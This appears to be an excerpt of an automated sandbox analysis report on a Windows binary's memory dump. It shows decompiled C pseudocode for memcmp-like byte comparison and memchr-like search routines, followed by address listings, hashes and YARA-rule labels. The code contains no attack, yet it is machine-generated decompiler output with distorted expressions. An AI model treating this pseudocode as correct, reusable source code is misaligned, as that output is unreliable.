								_t271 = (_t288 > 0) + _t107;
								if(_t271 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t295 = (_t194 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t295 == 0) {
								L38:
								_t297 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t297 == 0) {
									L40:
									_t299 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t299 == 0) {
										L42:
										_t271 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t271 != 0) {
											_t100 = (0 | _t271 > 0x00000000) - 1; // -1
											_t271 = (_t271 > 0) + _t100;
										}
										goto L45;
									}
									_t94 = (0 | _t299 > 0x00000000) - 1; // -1
									_t271 = (_t299 > 0) + _t94;
									if(_t271 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t88 = (0 | _t297 > 0x00000000) - 1; // -1
								_t271 = (_t297 > 0) + _t88;
								if(_t271 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t82 = (0 | _t295 > 0x00000000) - 1; // -1
							_t271 = (_t295 > 0) + _t82;
							if(_t271 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t302 = (_t193 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L27:
							_t304 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L29:
								_t306 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L31:
									_t271 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t271 != 0) {
										_t75 = (0 | _t271 > 0x00000000) - 1; // -1
										_t271 = (_t271 > 0) + _t75;
									}
									goto L34;
								}
								_t69 = (0 | _t306 > 0x00000000) - 1; // -1
								_t271 = (_t306 > 0) + _t69;
								if(_t271 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t63 = (0 | _t304 > 0x00000000) - 1; // -1
							_t271 = (_t304 > 0) + _t63;
							if(_t271 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t57 = (0 | _t302 > 0x00000000) - 1; // -1
						_t271 = (_t302 > 0) + _t57;
						if(_t271 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t309 = (_t192 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t309 == 0) {
						L16:
						_t311 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t311 == 0) {
							L18:
							_t313 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t313 == 0) {
								L20:
								_t271 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t271 != 0) {
									_t50 = (0 | _t271 > 0x00000000) - 1; // -1
									_t271 = (_t271 > 0) + _t50;
								}
								goto L23;
							}
							_t44 = (0 | _t313 > 0x00000000) - 1; // -1
							_t271 = (_t313 > 0) + _t44;
							if(_t271 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t38 = (0 | _t311 > 0x00000000) - 1; // -1
						_t271 = (_t311 > 0) + _t38;
						if(_t271 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t32 = (0 | _t309 > 0x00000000) - 1; // -1
					_t271 = (_t309 > 0) + _t32;
					if(_t271 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L12;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L9;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L7;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t271;
				goto L2;
			}

0x00876436
0x00876436
0x0087643c
0x008764b3
0x008764b5
0x008764b7
0x00000000
0x00000000
0x008764bd
0x008764c3
0x0087653a
0x0087653c
0x0087653e
0x00000000
0x00000000
0x00876544
0x0087654a
0x008765c1
0x008765c3
0x008765c5
0x00000000
0x00000000
0x008765cb
0x008765d1
0x00876648
0x0087664a
0x0087664c
0x00000000
0x00000000
0x00876652
0x00876658
0x008766cf
0x008766d1
0x008766d3
0x00000000
0x00000000
0x008766df
0x00876757
0x00876759
0x0087675b
0x00000000
0x00000000
0x00876761
0x00876767
0x008767de
0x008767e0
0x008767e2
0x00000000
0x00000000
0x008767f0
0x008767f2
0x008767ff
0x008767ff
0x008767ff
0x00876430
0x008770d4
0x008770d4
0x00876770
0x00876772
0x00876787
0x0087678f
0x00876791
0x008767a6
0x008767ae
0x008767b0
0x008767c5
0x008767cd
0x008767cf
0x008767d8
0x008767d8
0x008767d8
0x00000000
0x008767cf
0x008767b9
0x008767b9
0x008767bf
0x00000000
0x00000000
0x00000000
0x008767bf
0x0087679a
0x0087679a
0x008767a0
0x00000000
0x00000000
0x00000000
0x008767a0
0x0087677b
0x0087677b
0x00876781
0x00000000
0x00000000
0x00000000
0x00876781
0x008766e9
0x008766eb
0x00876700
0x00876708
0x0087670a
0x0087671f
0x00876727
0x00876729
0x0087673e
0x00876746
0x00876748
0x00876751
0x00876751
0x00876751
0x00000000
0x00876748
0x00876732
0x00876732
0x00876738
0x00000000
0x00000000
0x00000000
0x00876738
0x00876713
0x00876713
0x00876719
0x00000000
0x00000000
0x00000000
0x00876719
0x008766f4
0x008766f4
0x008766fa
0x00000000
0x00000000
0x00000000
0x008766fa
0x00876661
0x00876663
0x00876678
0x00876680
0x00876682
0x00876697
0x0087669f
0x008766a1
0x008766b6
0x008766be
0x008766c0
0x008766c9
0x008766c9
0x008766c9
0x00000000
0x008766c0
0x008766aa
0x008766aa
0x008766b0
0x00000000
0x00000000
0x00000000
0x008766b0
0x0087668b
0x0087668b
0x00876691
0x00000000
0x00000000
0x00000000
0x00876691
0x0087666c
0x0087666c
0x00876672
0x00000000
0x00000000
0x00000000
0x00876672
0x008765da
0x008765dc
0x008765f1
0x008765f9
0x008765fb
0x00876610
0x00876618
0x0087661a
0x0087662f
0x00876637
0x00876639
0x00876642
0x00876642
0x00876642
0x00000000
0x00876639
0x00876623
0x00876623
0x00876629
0x00000000
0x00000000
0x00000000
0x00876629
0x00876604
0x00876604
0x0087660a
0x00000000
0x00000000
0x00000000
0x0087660a
0x008765e5
0x008765e5
0x008765eb
0x00000000
0x00000000
0x00000000
0x008765eb
0x00876553
0x00876555
0x0087656a
0x00876572
0x00876574
0x00876589
0x00876591
0x00876593
0x008765a8
0x008765b0
0x008765b2
0x008765bb
0x008765bb
0x008765bb
0x00000000
0x008765b2
0x0087659c
0x0087659c
0x008765a2
0x00000000
0x00000000
0x00000000
0x008765a2
0x0087657d
0x0087657d
0x00876583
0x00000000
0x00000000
0x00000000
0x00876583
0x0087655e
0x0087655e
0x00876564
0x00000000
0x00000000
0x00000000
0x00876564
0x008764cc
0x008764ce
0x008764e3
0x008764eb
0x008764ed
0x00876502
0x0087650a
0x0087650c
0x00876521
0x00876529
0x0087652b
0x00876534
0x00876534
0x00876534
0x00000000
0x0087652b
0x00876515
0x00876515
0x0087651b
0x00000000
0x00000000
0x00000000
0x0087651b
0x008764f6
0x008764f6
0x008764fc
0x00000000
0x00000000
0x00000000
0x008764fc
0x008764d7
0x008764d7
0x008764dd
0x00000000
0x00000000
0x00000000
0x0087643e
0x0087643e
0x00876441
0x00876445
0x00876447
0x0087645c
0x0087645c
0x00876460
0x00876464
0x00876466
0x0087647b
0x0087647b
0x0087647f
0x00876483
0x00876485
0x0087649a
0x0087649a
0x0087649e
0x008764a2
0x008764a4
0x008764a6
0x008764ad
0x008764ad
0x008764ad
0x00000000
0x008764a4
0x00876487
0x0087648b
0x0087648e
0x0087648e
0x00876494
0x00000000
0x00000000
0x00000000
0x00876494
0x00876468
0x0087646c
0x0087646f
0x0087646f
0x00876475
0x00000000
0x00000000
0x00000000
0x00876475
0x00876449
0x0087644d
0x00876450
0x00876450
0x00876456
0x00000000
0x00000000
0x00000000
0x00876456
0x00876091
0x00876091
0x00000000

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: d18116e7aaa2b0c0f59b5b7e212f450efe199188f6b75ddca3ba13295cf240fb
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 2FC17D73D0ADB2498B36453D041822AEE62BF91B8431AC3D5CCD87F18EE623ED6595D0

Uniqueness

Uniqueness Score: -1.00%

Function 00876098, Relevance: .3, Instructions: 326
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00876098(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed char _t191;
				signed int _t197;
				signed int _t263;
				void* _t266;
				void* _t268;
				void* _t270;
				void* _t272;
				void* _t274;
				void* _t276;
				void* _t279;
				void* _t281;
				void* _t283;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t263 = 0;
					L11:
					if(_t263 != 0) {
						goto L1;
					}
					_t186 =  *(_t177 - 0x18);
					if(_t186 ==  *(_t181 - 0x18)) {
						_t263 = 0;
						L22:
						if(_t263 != 0) {
							goto L1;
						}
						_t187 =  *(_t177 - 0x14);
						if(_t187 ==  *(_t181 - 0x14)) {
							_t263 = 0;
							L33:
							if(_t263 != 0) {
								goto L1;
							}
							_t188 =  *(_t177 - 0x10);
							if(_t188 ==  *(_t181 - 0x10)) {
								_t263 = 0;
								L44:
								if(_t263 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t263 = 0;
									L55:
									if(_t263 != 0) {
										goto L1;
									}
									_t190 =  *(_t177 - 8);
									if(_t190 ==  *(_t181 - 8)) {
										_t263 = 0;
										L66:
										if(_t263 != 0) {
											goto L1;
										}
										_t191 =  *(_t177 - 4);
										if(_t191 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t266 = (_t191 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t266 == 0) {
											L70:
											_t268 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t268 == 0) {
												L72:
												_t270 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t270 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t176 = (0 | _t178 > 0x00000000) - 1; // -1
														_t178 = (_t178 > 0) + _t176;
													}
													goto L78;
												}
												_t197 = (0 | _t270 > 0x00000000) + (0 | _t270 > 0x00000000) - 1;
												if(_t197 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t197;
												goto L78;
											}
											_t197 = (0 | _t268 > 0x00000000) + (0 | _t268 > 0x00000000) - 1;
											if(_t197 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t197 = (0 | _t266 > 0x00000000) + (0 | _t266 > 0x00000000) - 1;
										if(_t197 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t272 = (_t190 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t272 == 0) {
										L59:
										_t274 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t274 == 0) {
											L61:
											_t276 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t276 == 0) {
												L63:
												_t263 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t263 != 0) {
													_t151 = (0 | _t263 > 0x00000000) - 1; // -1
													_t263 = (_t263 > 0) + _t151;
												}
												goto L66;
											}
											_t145 = (0 | _t276 > 0x00000000) - 1; // -1
											_t263 = (_t276 > 0) + _t145;
											if(_t263 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t139 = (0 | _t274 > 0x00000000) - 1; // -1
										_t263 = (_t274 > 0) + _t139;
										if(_t263 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t133 = (0 | _t272 > 0x00000000) - 1; // -1
									_t263 = (_t272 > 0) + _t133;
									if(_t263 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t279 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t279 == 0) {
									L48:
									_t281 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t281 == 0) {
										L50:
										_t283 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t283 == 0) {
											L52:
											_t263 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t263 != 0) {
												_t126 = (0 | _t263 > 0x00000000) - 1; // -1
												_t263 = (_t263 > 0) + _t126;
											}
											goto L55;
										}
										_t120 = (0 | _t283 > 0x00000000) - 1; // -1
										_t263 = (_t283 > 0) + _t120;
										if(_t263 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t114 = (0 | _t281 > 0x00000000) - 1; // -1
									_t263 = (_t281 > 0) + _t114;
									if(_t263 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t108 = (0 | _t279 > 0x00000000) - 1; // -1
								_t263 = (_t279 > 0) + _t108;
								if(_t263 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t286 = (_t188 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t286 == 0) {
								L37:
								_t288 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t288 == 0) {
									L39:
									_t290 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t290 == 0) {
										L41:
										_t263 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t263 != 0) {
											_t100 = (0 | _t263 > 0x00000000) - 1; // -1
											_t263 = (_t263 > 0) + _t100;
										}
										goto L44;
									}
									_t94 = (0 | _t290 > 0x00000000) - 1; // -1
									_t263 = (_t290 > 0) + _t94;
									if(_t263 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t88 = (0 | _t288 > 0x00000000) - 1; // -1
								_t263 = (_t288 > 0) + _t88;
								if(_t263 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t82 = (0 | _t286 > 0x00000000) - 1; // -1
							_t263 = (_t286 > 0) + _t82;
							if(_t263 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t293 = (_t187 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t293 == 0) {
							L26:
							_t295 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t295 == 0) {
								L28:
								_t297 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t297 == 0) {
									L30:
									_t263 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t263 != 0) {
										_t75 = (0 | _t263 > 0x00000000) - 1; // -1
										_t263 = (_t263 > 0) + _t75;
									}
									goto L33;
								}
								_t69 = (0 | _t297 > 0x00000000) - 1; // -1
								_t263 = (_t297 > 0) + _t69;
								if(_t263 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t63 = (0 | _t295 > 0x00000000) - 1; // -1
							_t263 = (_t295 > 0) + _t63;
							if(_t263 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t57 = (0 | _t293 > 0x00000000) - 1; // -1
						_t263 = (_t293 > 0) + _t57;
						if(_t263 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t300 = (_t186 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t300 == 0) {
						L15:
						_t302 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t302 == 0) {
							L17:
							_t304 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t304 == 0) {
								L19:
								_t263 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t263 != 0) {
									_t50 = (0 | _t263 > 0x00000000) - 1; // -1
									_t263 = (_t263 > 0) + _t50;
								}
								goto L22;
							}
							_t44 = (0 | _t304 > 0x00000000) - 1; // -1
							_t263 = (_t304 > 0) + _t44;
							if(_t263 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t38 = (0 | _t302 > 0x00000000) - 1; // -1
						_t263 = (_t302 > 0) + _t38;
						if(_t263 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t32 = (0 | _t300 > 0x00000000) - 1; // -1
					_t263 = (_t300 > 0) + _t32;
					if(_t263 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L11;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L8;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L6;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t263;
				goto L80;
			}

0x00876098
0x00876098
0x0087609e
0x00876109
0x0087610b
0x0087610d
0x00000000
0x00000000
0x0087610f
0x00876115
0x0087618c
0x0087618e
0x00876190
0x00000000
0x00000000
0x00876196
0x0087619c
0x00876213
0x00876215
0x00876217
0x00000000
0x00000000
0x0087621d
0x00876223
0x0087629a
0x0087629c
0x0087629e
0x00000000
0x00000000
0x008762aa
0x00876322
0x00876324
0x00876326
0x00000000
0x00000000
0x0087632c
0x00876332
0x008763a9
0x008763ab
0x008763ad
0x00000000
0x00000000
0x008763b3
0x008763b9
0x00876428
0x0087642a
0x0087642c
0x0087642e
0x0087642e
0x00876430
0x008770d4
0x008770d4
0x008763c2
0x008763c4
0x008763d5
0x008763dd
0x008763df
0x008763f0
0x008763f8
0x008763fa
0x0087640f
0x00876417
0x00876419
0x00876422
0x00876422
0x00876422
0x00000000
0x00876419
0x00876403
0x00876409
0x00000000
0x00000000
0x0087640b
0x0087640b
0x00000000
0x0087640b
0x008763e8
0x008763ee
0x00000000
0x00000000
0x00000000
0x008763ee
0x008763cd
0x008763d3
0x00000000
0x00000000
0x00000000
0x008763d3
0x0087633b
0x0087633d
0x00876352
0x0087635a
0x0087635c
0x00876371
0x00876379
0x0087637b
0x00876390
0x00876398
0x0087639a
0x008763a3
0x008763a3
0x008763a3
0x00000000
0x0087639a
0x00876384
0x00876384
0x0087638a
0x00000000
0x00000000
0x00000000
0x0087638a
0x00876365
0x00876365
0x0087636b
0x00000000
0x00000000
0x00000000
0x0087636b
0x00876346
0x00876346
0x0087634c
0x00000000
0x00000000
0x00000000
0x0087634c
0x008762b4
0x008762b6
0x008762cb
0x008762d3
0x008762d5
0x008762ea
0x008762f2
0x008762f4
0x00876309
0x00876311
0x00876313
0x0087631c
0x0087631c
0x0087631c
0x00000000
0x00876313
0x008762fd
0x008762fd
0x00876303
0x00000000
0x00000000
0x00000000
0x00876303
0x008762de
0x008762de
0x008762e4
0x00000000
0x00000000
0x00000000
0x008762e4
0x008762bf
0x008762bf
0x008762c5
0x00000000
0x00000000
0x00000000
0x008762c5
0x0087622c
0x0087622e
0x00876243
0x0087624b
0x0087624d
0x00876262
0x0087626a
0x0087626c
0x00876281
0x00876289
0x0087628b
0x00876294
0x00876294
0x00876294
0x00000000
0x0087628b
0x00876275
0x00876275
0x0087627b
0x00000000
0x00000000
0x00000000
0x0087627b
0x00876256
0x00876256
0x0087625c
0x00000000
0x00000000
0x00000000
0x0087625c
0x00876237
0x00876237
0x0087623d
0x00000000
0x00000000
0x00000000
0x0087623d
0x008761a5
0x008761a7
0x008761bc
0x008761c4
0x008761c6
0x008761db
0x008761e3
0x008761e5
0x008761fa
0x00876202
0x00876204
0x0087620d
0x0087620d
0x0087620d
0x00000000
0x00876204
0x008761ee
0x008761ee
0x008761f4
0x00000000
0x00000000
0x00000000
0x008761f4
0x008761cf
0x008761cf
0x008761d5
0x00000000
0x00000000
0x00000000
0x008761d5
0x008761b0
0x008761b0
0x008761b6
0x00000000
0x00000000
0x00000000
0x008761b6
0x0087611e
0x00876120
0x00876135
0x0087613d
0x0087613f
0x00876154
0x0087615c
0x0087615e
0x00876173
0x0087617b
0x0087617d
0x00876186
0x00876186
0x00876186
0x00000000
0x0087617d
0x00876167
0x00876167
0x0087616d
0x00000000
0x00000000
0x00000000
0x0087616d
0x00876148
0x00876148
0x0087614e
0x00000000
0x00000000
0x00000000
0x0087614e
0x00876129
0x00876129
0x0087612f
0x00000000
0x00000000
0x00000000
0x008760a0
0x008760a0
0x008760a3
0x008760a7
0x008760a9
0x008760ba
0x008760ba
0x008760be
0x008760c2
0x008760c4
0x008760d5
0x008760d5
0x008760d9
0x008760dd
0x008760df
0x008760f0
0x008760f0
0x008760f4
0x008760f8
0x008760fa
0x008760fc
0x00876103
0x00876103
0x00876103
0x00000000
0x008760fa
0x008760e1
0x008760e5
0x008760e8
0x008760e8
0x008760ee
0x00000000
0x00000000
0x00000000
0x008760ee
0x008760c6
0x008760ca
0x008760cd
0x008760cd
0x008760d3
0x00000000
0x00000000
0x00000000
0x008760d3
0x008760ab
0x008760af
0x008760b2
0x008760b2
0x008760b8
0x00000000
0x00000000
0x00000000
0x008760b8
0x00876091
0x00876091
0x00000000

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 21e96c5e8021856e75e1d39cdf2d32ef7972a6c37950c96a2348a84e5cd0d88d
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 60B17F23E1ADB2498B76413D045822AEF62BF91B4031EC3E5DCD87F18EE623ED6595D0

Uniqueness

Uniqueness Score: -1.00%

Function 0086A7E0, Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0086A7E0(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										_t12 = _t39 - 4; // -12
										return _t12;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											_t11 = _t39 - 3; // -11
											return _t11;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												_t10 = _t39 - 2; // -10
												return _t10;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						_t9 = _t39 - 1; // -9
						return _t9;
					}
				}
				L24:
			}

0x0086a7e0
0x0086a7e7
0x0086a83c
0x0086a83c
0x0086a7e9
0x0086a7e9
0x0086a7ef
0x0086a7f9
0x0086a811
0x0086a811
0x0086a814
0x0086a828
0x0086a828
0x0086a82b
0x00000000
0x0086a82d
0x0086a82d
0x0086a82d
0x0086a82f
0x0086a834
0x00000000
0x00000000
0x0086a836
0x0086a839
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0086a839
0x00000000
0x0086a82d
0x0086a816
0x0086a823
0x0086a842
0x0086a844
0x0086a852
0x0086a85b
0x00000000
0x0086a85d
0x0086a860
0x0086a862
0x0086a887
0x0086a88c
0x0086a864
0x0086a864
0x0086a866
0x0086a881
0x0086a886
0x0086a868
0x0086a86b
0x0086a86d
0x0086a87b
0x0086a880
0x0086a86f
0x0086a871
0x00000000
0x0086a873
0x00000000
0x0086a873
0x0086a871
0x0086a86d
0x0086a866
0x0086a862
0x00000000
0x0086a83d
0x0086a83d
0x0086a83d
0x00000000
0x0086a827
0x0086a7fb
